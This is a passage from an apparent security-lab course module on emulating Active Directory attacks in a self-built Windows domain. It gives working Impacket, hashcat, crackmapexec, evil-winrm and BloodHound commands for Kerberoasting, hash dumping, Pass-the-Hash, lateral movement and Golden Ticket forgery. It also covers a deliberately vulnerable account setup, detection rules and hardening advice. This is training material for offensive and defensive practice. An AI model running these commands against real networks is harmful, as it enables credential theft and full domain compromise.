jramos/seclab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
seclab/MOD5_Active_Directory_Emulation.md
jramos 6d0035721e initial commit
2026-05-28 18:27:41 -06:00

1085 lines
35 KiB
Markdown
Raw Permalink Blame History

# MODULE 5: ACTIVE DIRECTORY THREAT EMULATION
## Learning Objectives
By completing this module, you will:
- Understand Active Directory architecture and Kerberos authentication
- Deploy a Windows domain environment with Domain Controller and endpoints
- Execute Kerberoasting attacks to extract and crack service account credentials
- Perform Pass-the-Hash and Pass-the-Ticket credential replay attacks
- Conduct lateral movement using PsExec, WMI, and Windows Management protocols
- Enumerate AD environments using BloodHound and PowerView
- Map AD attack techniques to MITRE ATT&CK framework
- Implement detection rules for identity-based attacks
---
## Key Concepts
### Active Directory (AD)
**Active Directory** is Microsoft's centralized identity and access management system, used by over 90% of enterprise networks. AD provides:
- **Authentication:** Verifies user/computer identities via Kerberos
- **Authorization:** Controls access to resources (files, printers, applications)
- **Directory Services:** Centralized database of users, computers, groups, policies
### Kerberos Authentication Protocol
```
User Domain Controller File Server
| | |
|---1. AS-REQ-----------> | (Request TGT) |
|<--2. AS-REP (TGT)------ | (Ticket Granting Ticket) |
| | |
|---3. TGS-REQ (TGT)----> | (Request Service Ticket) |
|<--4. TGS-REP (ST)------ | (Service Ticket) |
| | |
|---5. AP-REQ (ST)------------------------------> |
|<--6. Access Granted-------------------------------- |
```
**Key Terms:**
- **TGT (Ticket Granting Ticket):** Proves identity to Domain Controller
- **Service Ticket (ST):** Grants access to specific service (file share, SQL server)
- **SPN (Service Principal Name):** Identifier for services (e.g., `HTTP/web.apophis.local`)
- **NTLM Hash:** Password representation (used for Pass-the-Hash attacks)
### Why Active Directory is Critical Attack Surface
**Enterprise Reality:**
- 95% of Fortune 1000 companies use Active Directory
- Single compromised domain admin account = full network compromise
- Identity-based attacks bypass perimeter security (firewalls, VPNs)
- Most data breaches involve credential theft, not software exploits
**Common AD Attacks:**
1. **Kerberoasting:** Extract encrypted service tickets, crack offline
2. **Pass-the-Hash:** Use stolen NTLM hash without knowing plaintext password
3. **Golden Ticket:** Forge TGTs to impersonate any user
4. **DCSync:** Replicate AD database to steal all password hashes
---
## LAB 5.1: DEPLOY ACTIVE DIRECTORY DOMAIN
### Deploy Windows Server 2022 (Domain Controller)
```
1. CREATE VM IN PROXMOX:
- VM ID: 402
- Name: DC01-Apophis
- OS: Windows Server 2022 ISO
- CPU: 2 cores
- RAM: 4096 MB (4 GB minimum for AD)
- Disk: 60 GB
- Network: vmbr0, VLAN Tag: 400 (VICTIM_NET)
2. INSTALL WINDOWS SERVER:
- Select: Windows Server 2022 Standard (Desktop Experience)
- Custom installation: Select full disk
- Set Administrator password: P@ssw0rd! (for lab only)
3. CONFIGURE STATIC IP:
- Open: Settings > Network & Internet > Ethernet
- IP address: 10.10.4.100
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 127.0.0.1 (will point to itself after AD installation)
4. RENAME COMPUTER:
- Server Manager > Local Server > Computer Name > Change
- New name: DC01
- Restart when prompted
5. INSTALL ACTIVE DIRECTORY DOMAIN SERVICES:
- Server Manager > Manage > Add Roles and Features
- Server Roles: Check "Active Directory Domain Services"
- Click "Add Features" when prompted
- Click "Next" through wizard, then "Install"
- Wait 5-10 minutes for installation
6. PROMOTE TO DOMAIN CONTROLLER:
- Server Manager > Notification flag (yellow triangle)
- Click "Promote this server to a domain controller"
- Select: "Add a new forest"
- Root domain name: apophis.local
- Forest/Domain functional level: Windows Server 2016 (default)
- DSRM password: P@ssw0rd!
- Click "Next" through wizard
- Prerequisites Check: Click "Install"
- Server will automatically restart (takes 5-10 minutes)
7. VERIFY AD INSTALLATION:
- Login as: APOPHIS\Administrator
- Password: P@ssw0rd!
- Open: Active Directory Users and Computers (Start > search "dsa.msc")
- Expand apophis.local > See default OUs (Users, Computers, Domain Controllers)
```
### Deploy Windows 10 (Domain Endpoint)
```
1. CREATE VM IN PROXMOX:
- VM ID: 403
- Name: CLIENT01-Apophis
- OS: Windows 10 Pro ISO
- CPU: 2 cores
- RAM: 4096 MB
- Disk: 40 GB
- Network: vmbr0, VLAN Tag: 400
2. INSTALL WINDOWS 10:
- Select: Windows 10 Pro
- Create local user: labuser
- Password: Welcome1
3. CONFIGURE NETWORK:
- Settings > Network & Internet > Ethernet > Change adapter options
- Right-click Ethernet > Properties > IPv4
- IP address: 10.10.4.110
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 10.10.4.100 (Domain Controller IP)
- Click OK
4. VERIFY DNS RESOLUTION:
- Open Command Prompt
- Run: nslookup apophis.local
- Should resolve to: 10.10.4.100
- If not, check DC01 DNS service is running
5. JOIN DOMAIN:
- Settings > System > About > Rename this PC (advanced)
- Click "Change"
- Member of: Domain
- Domain: apophis.local
- Click OK
- Credentials: APOPHIS\Administrator / P@ssw0rd!
- Welcome message appears: "Welcome to the apophis.local domain"
- Restart when prompted
6. LOGIN AS DOMAIN USER:
- At login screen: Other user
- Username: Administrator
- Password: P@ssw0rd!
- Domain: APOPHIS (or APOPHIS\Administrator)
- Verify: whoami → apophis\administrator
```
### Create Vulnerable Service Account (Kerberoasting Target)
```powershell
# On Domain Controller (DC01), open PowerShell as Administrator
# CREATE ORGANIZATIONAL UNIT FOR SERVICE ACCOUNTS
New-ADOrganizationalUnit -Name "Service Accounts" -Path "DC=apophis,DC=local"
# CREATE SERVICE ACCOUNT WITH WEAK PASSWORD
New-ADUser -Name "svc_sql" `
-SamAccountName "svc_sql" `
-UserPrincipalName "svc_sql@apophis.local" `
-AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) `
-Enabled $true `
-PasswordNeverExpires $true `
-Path "OU=Service Accounts,DC=apophis,DC=local"
# ASSIGN SERVICE PRINCIPAL NAME (SPN) - THIS MAKES IT KERBEROASTABLE
setspn -A MSSQLSvc/sqlserver.apophis.local:1433 apophis\svc_sql
# VERIFY SPN WAS SET
setspn -L svc_sql
# Expected output:
# Registered ServicePrincipalNames for CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local:
# MSSQLSvc/sqlserver.apophis.local:1433
# ADD TO DOMAIN ADMINS (simulate high-privilege service account)
Add-ADGroupMember -Identity "Domain Admins" -Members svc_sql
# CREATE ADDITIONAL DOMAIN USERS FOR REALISM
New-ADUser -Name "John Smith" -SamAccountName "jsmith" -AccountPassword (ConvertTo-SecureString "Welcome1" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Jane Doe" -SamAccountName "jdoe" -AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Bob Admin" -SamAccountName "badmin" -AccountPassword (ConvertTo-SecureString "Admin123" -AsPlainText -Force) -Enabled $true
# ADD BOB TO DOMAIN ADMINS
Add-ADGroupMember -Identity "Domain Admins" -Members badmin
# VERIFY USERS CREATED
Get-ADUser -Filter * | Select-Object Name, SamAccountName
```
**Why This Configuration is Vulnerable:**
- **Weak Password:** "Password123" is in common wordlists (rockyou.txt)
- **SPN Assigned:** Any domain user can request service ticket for this account
- **Password Never Expires:** No rotation policy (common in real enterprises)
- **Domain Admin Membership:** Cracking this account = full domain compromise
---
## LAB 5.2: KERBEROASTING ATTACK
### Understanding Kerberoasting
**Attack Flow:**
1. Attacker compromises low-privilege domain user account
2. Queries AD for all accounts with Service Principal Names (SPNs)
3. Requests service tickets for those accounts from Domain Controller
4. DC responds with tickets encrypted using service account's NTLM hash
5. Attacker takes tickets offline and cracks with hashcat/John (no account lockout)
6. If password is weak, attacker obtains plaintext credentials
**Why It Works:**
- Requesting service tickets is normal behavior (not suspicious)
- Encryption uses RC4/AES derived from password hash (not random key)
- Cracking happens offline at millions of guesses per second
- No failed login attempts (no account lockout)
### LAB 5.2.1: Kerberoasting with Impacket (from Kali Linux)
**Prerequisites:**
- Compromised domain credentials (jsmith / Welcome1)
- Network access to Domain Controller (10.10.4.100)
```bash
# FROM KALI LINUX (VLAN 200 - Red Team)
# STEP 1: VERIFY CONNECTIVITY TO DOMAIN CONTROLLER
ping 10.10.4.100
# Expected: Replies from 10.10.4.100
# STEP 2: VERIFY DNS RESOLUTION (if pfSense DNS configured)
nslookup apophis.local 10.10.4.100
# Expected: Name: apophis.local, Address: 10.10.4.100
# STEP 3: ENUMERATE SPNS WITH GETUSERSPNS.PY (Impacket)
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100
# Expected Output:
# ServicePrincipalName Name MemberOf PasswordLastSet
# ------------------------------------- ------- ------------------------------------ -------------------
# MSSQLSvc/sqlserver.apophis.local:1433 svc_sql CN=Domain Admins,CN=Users,DC=apophis 2024-01-15 10:23:45
# STEP 4: REQUEST SERVICE TICKET AND SAVE TO FILE
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100 -request -outputfile kerberoast_hashes.txt
# Expected Output:
# [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
# ^ If you see this, sync time with: sudo ntpdate 10.10.4.100
# Successful output:
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL$MSSQLSvc/sqlserver.apophis.local:1433*$a1b2c3d4...
# STEP 5: VERIFY HASH FILE
cat kerberoast_hashes.txt
# Should contain Kerberos TGS-REP hash in John/Hashcat format
# STEP 6: CRACK WITH HASHCAT
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# -m 13100 = Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
# --force = Ignore warnings (for VM environments)
# Expected Output (after 30-60 seconds):
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL...:Password123
# STEP 7: EXTRACT CRACKED PASSWORD
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --show
# Output: ...svc_sql...:Password123
# STEP 8: VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# Expected Output:
# SMB 10.10.4.100 445 DC01 [+] apophis.local\svc_sql:Password123 (Pwn3d!)
# "Pwn3d!" = Account has administrative access to target
```
**Alternative: Rubeus (from Windows endpoint)**
```powershell
# If you have foothold on CLIENT01 (Windows 10 domain-joined)
# Download Rubeus from GitHub (https://github.com/GhostPack/Rubeus)
# Transfer to CLIENT01 via SMB/HTTP
# Execute Rubeus
.\Rubeus.exe kerberoast /outfile:tickets.txt
# Expected Output:
# [*] Total kerberoastable users : 1
# [*] SamAccountName : svc_sql
# [*] DistinguishedName : CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local
# [*] ServicePrincipalName : MSSQLSvc/sqlserver.apophis.local:1433
# [*] Hash written to tickets.txt
# Transfer tickets.txt to Kali for cracking
```
**Deliverable:** Screenshot showing:
1. GetUserSPNs.py enumeration output
2. Hashcat cracking success with plaintext password revealed
3. CrackMapExec verification showing "Pwn3d!"
---
## LAB 5.3: PASS-THE-HASH ATTACK
### Understanding Pass-the-Hash
**Concept:** Windows authentication can use NTLM hashes directly without needing plaintext passwords. If you steal a hash, you can authenticate as that user.
**Attack Scenario:**
1. Attacker compromises workstation with local admin access
2. Dumps LSASS memory to extract cached credentials (NTLM hashes)
3. Uses hash to authenticate to other systems via SMB/WMI/RDP
4. Repeats process to move laterally (spray-and-pray or targeted)
### LAB 5.3.1: Dumping NTLM Hashes with Secretsdump
```bash
# FROM KALI LINUX
# STEP 1: DUMP HASHES FROM DOMAIN CONTROLLER (requires admin creds)
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output (NTLM hashes):
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
# svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
# jsmith:1105:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
# Format: username:RID:LM_hash:NTLM_hash:::
# LM hash (aad3b435...) = Empty/disabled (modern Windows)
# NTLM hash = What we need for Pass-the-Hash
# STEP 2: SAVE ADMINISTRATOR NTLM HASH
ADMIN_HASH="58a478135a93ac3bf058a5ea0e8fdb71"
# This is the NT hash for Administrator account
# STEP 3: PASS-THE-HASH TO CLIENT01 (without knowing plaintext password)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:$ADMIN_HASH Administrator@10.10.4.110
# Breakdown:
# -hashes LM:NTLM (LM is always aad3b435b51404eeaad3b435b51404ee for empty)
# Administrator = username
# @10.10.4.110 = target (CLIENT01)
# Expected Output:
# [*] Requesting shares on 10.10.4.110.....
# [*] Found writable share ADMIN$
# [*] Uploading file [random].exe
# [*] Opening SVCManager on 10.10.4.110.....
# [*] Starting service [random] on 10.10.4.110.....
# [!] Press help for extra shell commands
# C:\Windows\system32>
# STEP 4: VERIFY ACCESS
whoami
# Output: nt authority\system (SYSTEM = highest privilege)
hostname
# Output: CLIENT01
# STEP 5: DUMP LOCAL SAM DATABASE (for more credentials)
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
# Download files to Kali (or use secretsdump on localhost)
```
**Alternative: CrackMapExec for Pass-the-Hash**
```bash
# TEST HASH AGAINST MULTIPLE TARGETS (spray technique)
crackmapexec smb 10.10.4.0/24 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 --local-auth
# --local-auth = Use local accounts (not domain)
# /24 = Scan entire subnet
# Expected Output:
# SMB 10.10.4.110 445 CLIENT01 [+] CLIENT01\Administrator:58a478... (Pwn3d!)
# SMB 10.10.4.100 445 DC01 [+] APOPHIS\Administrator:58a478... (Pwn3d!)
# EXECUTE COMMANDS REMOTELY WITH PASS-THE-HASH
crackmapexec smb 10.10.4.110 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 -x "whoami"
# -x = Execute command
# Expected Output: apophis\administrator
```
**Deliverable:**
- Screenshot showing secretsdump.py output with NTLM hashes
- Screenshot showing successful psexec.py shell with "nt authority\system"
---
## LAB 5.4: LATERAL MOVEMENT TECHNIQUES
### LAB 5.4.1: PsExec (Service-Based Execution)
**How PsExec Works:**
1. Connects to target via SMB (port 445)
2. Copies executable to ADMIN$ share (C:\Windows)
3. Creates and starts Windows service to run executable
4. Returns output via named pipes
```bash
# PSEXEC WITH CREDENTIALS
psexec.py apophis.local/svc_sql:Password123@10.10.4.110
# PSEXEC WITH HASH
psexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.10.4.110
# PSEXEC TO DOMAIN CONTROLLER
psexec.py apophis.local/Administrator:P@ssw0rd!@10.10.4.100
# Expected Shell:
# C:\Windows\system32> whoami
# nt authority\system
```
**Detection Artifacts:**
- Service creation event (Event ID 7045)
- Network connection to ADMIN$/IPC$ shares
- Process with parent: services.exe
### LAB 5.4.2: WMIExec (Fileless Execution)
**Advantage over PsExec:** No file written to disk (fileless), harder to detect
```bash
# WMIEXEC WITH CREDENTIALS
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110
# WMIEXEC WITH HASH
wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.10.4.110
# Expected Shell:
# C:\> whoami
# apophis\administrator
# EXECUTE SINGLE COMMAND (no interactive shell)
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110 "ipconfig"
```
**Detection Artifacts:**
- WMI process creation (Event ID 4688 with parent: WmiPrvSE.exe)
- Network: DCOM/WMI traffic (port 135 + ephemeral)
### LAB 5.4.3: SMBExec (Batch File Execution)
```bash
# SMBEXEC WITH CREDENTIALS
smbexec.py apophis.local/svc_sql:Password123@10.10.4.110
# Creates batch file in ADMIN$ share, executes via service
# More stealthy than PsExec (no executable dropped)
```
### LAB 5.4.4: Evil-WinRM (PowerShell Remoting)
**Prerequisite:** Target must have WinRM enabled (default on Servers, not Workstations)
```bash
# INSTALL EVIL-WINRM
sudo gem install evil-winrm
# CONNECT WITH CREDENTIALS
evil-winrm -i 10.10.4.100 -u Administrator -p 'P@ssw0rd!'
# CONNECT WITH HASH
evil-winrm -i 10.10.4.100 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71
# Expected Shell:
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
apophis\administrator
# UPLOAD FILES
upload /root/tools/mimikatz.exe C:\Windows\Temp\mimikatz.exe
# DOWNLOAD FILES
download C:\Windows\System32\config\SAM /root/loot/sam
```
---
## LAB 5.5: ACTIVE DIRECTORY ENUMERATION WITH BLOODHOUND
### Understanding BloodHound
**BloodHound** visualizes Active Directory relationships to identify attack paths:
- Who has admin rights on which computers?
- Shortest path from user X to Domain Admin?
- Which accounts have SPN (Kerberoastable)?
- Trust relationships between domains?
**Attack Workflow:**
1. Run SharpHound collector (PowerShell/C#) on domain-joined machine
2. Generates JSON files with AD relationships
3. Import into BloodHound GUI to visualize
4. Query for attack paths (e.g., "Shortest Path to Domain Admins")
### LAB 5.5.1: Install BloodHound on Kali
```bash
# STEP 1: INSTALL NEO4J (graph database)
sudo apt update
sudo apt install neo4j bloodhound -y
# STEP 2: START NEO4J DATABASE
sudo neo4j console
# Wait for "Started" message
# Access web UI: http://localhost:7474
# Default creds: neo4j / neo4j
# Change password when prompted: bloodhound123
# STEP 3: START BLOODHOUND GUI (new terminal)
bloodhound
# Login:
# Database URL: bolt://localhost:7687
# Username: neo4j
# Password: bloodhound123
```
### LAB 5.5.2: Collect AD Data with BloodHound Python Ingestor
```bash
# FROM KALI LINUX (no need to touch Windows machines)
# INSTALL BLOODHOUND-PYTHON
pip3 install bloodhound
# RUN COLLECTOR
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All
# Parameters:
# -u = username
# -p = password
# -d = domain
# -ns = nameserver (DC IP)
# -c All = collect everything (users, groups, computers, sessions, trusts)
# Expected Output:
# INFO: Found AD domain: apophis.local
# INFO: Connecting to LDAP server: dc01.apophis.local
# INFO: Found 1 domains
# INFO: Found 1 domains in the forest
# INFO: Found 2 computers
# INFO: Found 5 users
# INFO: Found 0 trusts
# INFO: Starting computer enumeration...
# INFO: Done in 00M 12S
# OUTPUT FILES:
ls -lh *.json
# 20240115_computers.json
# 20240115_users.json
# 20240115_groups.json
# 20240115_domains.json
```
### LAB 5.5.3: Analyze Attack Paths in BloodHound
```
1. IMPORT DATA INTO BLOODHOUND:
- BloodHound GUI > Upload Data (right panel)
- Select all JSON files from previous step
- Wait for import to complete (shows # of nodes processed)
2. SEARCH FOR DOMAIN ADMINS:
- Search bar > Type "Domain Admins" > Select group
- Right-click node > "Mark Group as High Value"
- Graph shows all members (Administrator, svc_sql, badmin)
3. FIND KERBEROASTABLE ACCOUNTS:
- Analysis tab > "List all Kerberoastable Accounts"
- Should show: svc_sql with SPN MSSQLSvc/sqlserver.apophis.local:1433
4. FIND SHORTEST PATH TO DOMAIN ADMINS:
- Analysis tab > "Shortest Paths to Domain Admins"
- Shows graph of attack paths from low-privilege users
- Example: jsmith → CLIENT01 (LocalAdmin) → badmin (Session) → Domain Admins
5. FIND COMPUTERS WHERE DOMAIN ADMINS ARE LOGGED IN:
- Search for specific user (e.g., "Administrator")
- Click node > "Sessions" tab
- Shows CLIENT01, DC01 (indicates where admin is logged in = PtH target)
6. CUSTOM CYPHER QUERY (advanced):
- Raw Query box (bottom):
MATCH (u:User {hasspn: true}) RETURN u
- Returns all users with SPN (Kerberoastable targets)
```
**Key Queries to Practice:**
```cypher
# Find all Domain Admins
MATCH (n:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}) RETURN n
# Find computers with unconstrained delegation (privilege escalation vector)
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Find users with "Password Never Expires"
MATCH (u:User {pwdneverexpires:true}) RETURN u
# Shortest path from specific user to Domain Admin
MATCH (u:User {name:"JSMITH@APOPHIS.LOCAL"}), (g:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}), p=shortestPath((u)-[*1..]->(g)) RETURN p
```
**Deliverable:**
- Screenshot showing BloodHound graph with "Shortest Path to Domain Admins"
- Screenshot showing Kerberoastable accounts query result
---
## LAB 5.6: GOLDEN TICKET ATTACK (ADVANCED)
### Understanding Golden Tickets
**Golden Ticket** = Forged Kerberos TGT (Ticket Granting Ticket) that grants:
- Impersonation of ANY user (including non-existent accounts)
- Access to ANY resource in the domain
- Validity for 10 years (default Kerberos ticket lifetime)
**Requirements:**
- KRBTGT account NTLM hash (extract from Domain Controller)
- Domain SID (Security Identifier)
**Why It's Devastating:**
- Bypasses password changes (uses KRBTGT hash, not user password)
- Undetectable by normal monitoring (valid Kerberos ticket)
- Persists until KRBTGT password rotated (twice for full removal)
### LAB 5.6.1: Extract KRBTGT Hash
```bash
# FROM KALI LINUX (requires Domain Admin access)
# METHOD 1: SECRETSDUMP AGAINST DOMAIN CONTROLLER
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100 -just-dc-user krbtgt
# Expected Output:
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3:::
# SAVE KRBTGT HASH
KRBTGT_HASH="d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3"
# METHOD 2: GET DOMAIN SID
lookupsid.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output:
# [*] Domain SID is: S-1-5-21-1234567890-1234567890-1234567890
# SAVE DOMAIN SID (remove last part after final hyphen)
DOMAIN_SID="S-1-5-21-1234567890-1234567890-1234567890"
```
### LAB 5.6.2: Forge Golden Ticket
```bash
# CREATE GOLDEN TICKET WITH TICKETER.PY (Impacket)
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain apophis.local fakeadmin
# Parameters:
# -nthash = KRBTGT NTLM hash
# -domain-sid = Domain SID
# -domain = Domain name
# fakeadmin = Username to impersonate (can be anything, even non-existent)
# Expected Output:
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for apophis.local/fakeadmin
# [*] Signing/Encrypting final ticket
# [*] Saving ticket in fakeadmin.ccache
# EXPORT TICKET TO ENVIRONMENT VARIABLE
export KRB5CCNAME=/root/fakeadmin.ccache
# VERIFY TICKET
klist
# Expected:
# Ticket cache: FILE:/root/fakeadmin.ccache
# Default principal: fakeadmin@APOPHIS.LOCAL
# Valid starting Expires Service principal
# 01/15/24 10:00:00 01/25/34 10:00:00 krbtgt/APOPHIS.LOCAL@APOPHIS.LOCAL
```
### LAB 5.6.3: Use Golden Ticket for Access
```bash
# ACCESS DOMAIN CONTROLLER WITH GOLDEN TICKET
psexec.py apophis.local/fakeadmin@DC01.apophis.local -k -no-pass
# Parameters:
# -k = Use Kerberos authentication (golden ticket)
# -no-pass = Don't prompt for password
# Expected Output:
# [*] Requesting shares on DC01.apophis.local.....
# [*] Found writable share ADMIN$
# C:\Windows\system32> whoami
# apophis\fakeadmin
# LIST DOMAIN CONTROLLER C:\ DRIVE
smbclient.py -k -no-pass apophis.local/fakeadmin@DC01.apophis.local
# Expected: Access to C$ share with full admin rights
```
**Defensive Countermeasure:**
```powershell
# ON DOMAIN CONTROLLER (as recovery action)
# RESET KRBTGT PASSWORD (do this TWICE, 24 hours apart)
# First reset invalidates current golden tickets
# Second reset (after replication) fully removes old hash
# Use Microsoft script: https://github.com/microsoft/New-KrbtgtKeys.ps1
.\New-KrbtgtKeys.ps1 -WhatIf
# Review changes, then run without -WhatIf
# MONITOR FOR GOLDEN TICKET USAGE
# Event ID 4769 (Kerberos TGS request) with:
# - Ticket encryption type: 0x17 (RC4)
# - Account name: Non-existent user
# - Ticket lifetime: Unusual (>10 hours)
```
---
## DEFENSIVE DETECTION & BLUE TEAM RESPONSE
### Detection Rules for Kerberoasting
**Event ID 4769 (Kerberos Service Ticket Request):**
```
ANOMALOUS INDICATORS:
- Ticket encryption type: 0x17 (RC4-HMAC) instead of 0x12 (AES256)
- Ticket options: 0x40810000 (forwardable, renewable, canonicalize)
- Service name: NOT krbtgt/* (indicates service ticket, not TGT)
- Frequency: Multiple SPN requests from single source in short time
SURICATA RULE:
alert tcp any any -> any 88 (msg:"Possible Kerberoasting - Multiple TGS-REQ"; \
flow:established,to_server; content:"|a0 03 02 01 05|"; \
threshold:type threshold, track by_src, count 5, seconds 60; \
sid:5000001; rev:1;)
SECURITY ONION KQL QUERY:
event.code: 4769 AND
winlog.event_data.TicketEncryptionType: "0x17" AND
NOT winlog.event_data.ServiceName: krbtgt*
| stats count by winlog.event_data.TargetUserName, source.ip
| where count > 5
```
### Detection Rules for Pass-the-Hash
**Event ID 4624 (Logon) with Type 3 (Network Logon):**
```
SUSPICIOUS INDICATORS:
- Logon Type: 3 (network)
- Authentication Package: NTLM (not Kerberos)
- Elevated Token: Yes
- Source IP: Not domain controller
SPLUNK QUERY:
index=windows EventCode=4624 Logon_Type=3 Authentication_Package=NTLM Elevated_Token=Yes
| where Source_Network_Address!="10.10.4.100"
| stats count by Account_Name, Source_Network_Address
SIGMA RULE:
title: Pass-the-Hash Activity Detected
status: experimental
logsource:
product: windows
service: security
detection:
selection:
EventID: 4624
LogonType: 3
AuthenticationPackageName: 'NTLM'
condition: selection
fields:
- TargetUserName
- IpAddress
falsepositives:
- Legitimate NTLM authentication (rare in modern environments)
level: high
```
### Detection Rules for Lateral Movement
**Event ID 7045 (Service Installation) - PsExec:**
```
INDICATORS:
- Service name: Contains random characters (e.g., "PSEXESVC")
- Service file path: \\Windows\\[random].exe
- Started by: Network logon (Event 4624 Type 3 precedes)
KQL QUERY:
event.code: 7045 AND
winlog.event_data.ServiceFileName: *\\Windows\\*.exe AND
NOT winlog.event_data.ServiceName: (known_service_list)
```
**Event ID 4688 (Process Creation) - WMI Execution:**
```
INDICATORS:
- Parent process: C:\Windows\System32\wbem\WmiPrvSE.exe
- Child process: Suspicious (cmd.exe, powershell.exe, unusual binaries)
- Command line: Contains encoded commands or download cradles
KQL QUERY:
event.code: 4688 AND
process.parent.name: "WmiPrvSE.exe" AND
process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe")
```
### Defensive Hardening Recommendations
```powershell
# DISABLE NTLM AUTHENTICATION (force Kerberos only)
# Group Policy: Computer Configuration > Windows Settings > Security Settings
# > Local Policies > Security Options
# Network security: Restrict NTLM: Incoming NTLM traffic = Deny all accounts
# ENABLE LAPS (LOCAL ADMIN PASSWORD SOLUTION)
# Randomizes local admin passwords on each machine (prevents lateral movement)
# Download: https://www.microsoft.com/en-us/download/details.aspx?id=46899
# IMPLEMENT PROTECTED USERS GROUP
# Add high-privilege accounts to "Protected Users" group (prevents NTLM auth)
Add-ADGroupMember -Identity "Protected Users" -Members Administrator,svc_sql
# ENABLE CREDENTIAL GUARD (Windows 10/Server 2016+)
# Protects LSASS from memory dumping attacks
# Group Policy: Computer Configuration > Administrative Templates
# > System > Device Guard > Turn On Virtualization Based Security
# MONITOR PRIVILEGED GROUP CHANGES
# Alert on Event ID 4728, 4732, 4756 (user added to security-enabled group)
# IMPLEMENT TIERED ADMINISTRATION MODEL
# Tier 0: Domain Controllers, Domain Admins (separate credentials)
# Tier 1: Servers (different admin accounts)
# Tier 2: Workstations (standard users)
# Prevents compromise cascade
```
---
## MITRE ATT&CK FRAMEWORK MAPPING
| Technique ID | Technique Name | Lab Coverage |
|--------------|----------------|--------------|
| **T1558.003** | Kerberoasting | LAB 5.2 (GetUserSPNs, Hashcat) |
| **T1550.002** | Pass-the-Hash | LAB 5.3 (Secretsdump, PsExec -hashes) |
| **T1021.002** | SMB/Windows Admin Shares | LAB 5.4 (PsExec, SMBExec) |
| **T1021.006** | Windows Remote Management | LAB 5.4 (Evil-WinRM) |
| **T1047** | Windows Management Instrumentation | LAB 5.4 (WMIExec) |
| **T1087.002** | Domain Account Discovery | LAB 5.5 (BloodHound enumeration) |
| **T1069.002** | Domain Groups Discovery | LAB 5.5 (BloodHound group mapping) |
| **T1482** | Domain Trust Discovery | LAB 5.5 (BloodHound trust analysis) |
| **T1558.001** | Golden Ticket | LAB 5.6 (Ticketer.py, KRBTGT extraction) |
| **T1003.001** | LSASS Memory Dump | LAB 5.3 (Secretsdump mimikatz) |
**Kill Chain Phase:** Lateral Movement (Stage 4), Privilege Escalation (Stage 3)
---
## TROUBLESHOOTING GUIDE
### Issue: GetUserSPNs fails with "KRB_AP_ERR_SKEW"
**Root Cause:** Clock skew between Kali Linux and Domain Controller (Kerberos requires <5 min difference)
**Solution:**
```bash
# SYNC TIME WITH DOMAIN CONTROLLER
sudo ntpdate 10.10.4.100
# Or: sudo timedatectl set-ntp true
# VERIFY TIME SYNC
date
# Compare to DC time
```
### Issue: Secretsdump returns "STATUS_LOGON_FAILURE"
**Root Cause:** Incorrect credentials or account locked
**Solution:**
```bash
# VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# CHECK ACCOUNT STATUS ON DOMAIN CONTROLLER
Get-ADUser -Identity svc_sql | Select-Object Enabled, LockedOut, PasswordExpired
```
### Issue: BloodHound shows no data after import
**Root Cause:** JSON files empty or collection failed
**Solution:**
```bash
# RE-RUN COLLECTION WITH VERBOSE OUTPUT
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All --zip -v
# --zip = Creates single ZIP file for easier upload
# -v = Verbose output for debugging
# VERIFY FILE SIZES
ls -lh *.json
# Should have KB-MB of data, not 0 bytes
```
### Issue: PsExec hangs at "Requesting shares"
**Root Cause:** Firewall blocking SMB (port 445) or ADMIN$ share not accessible
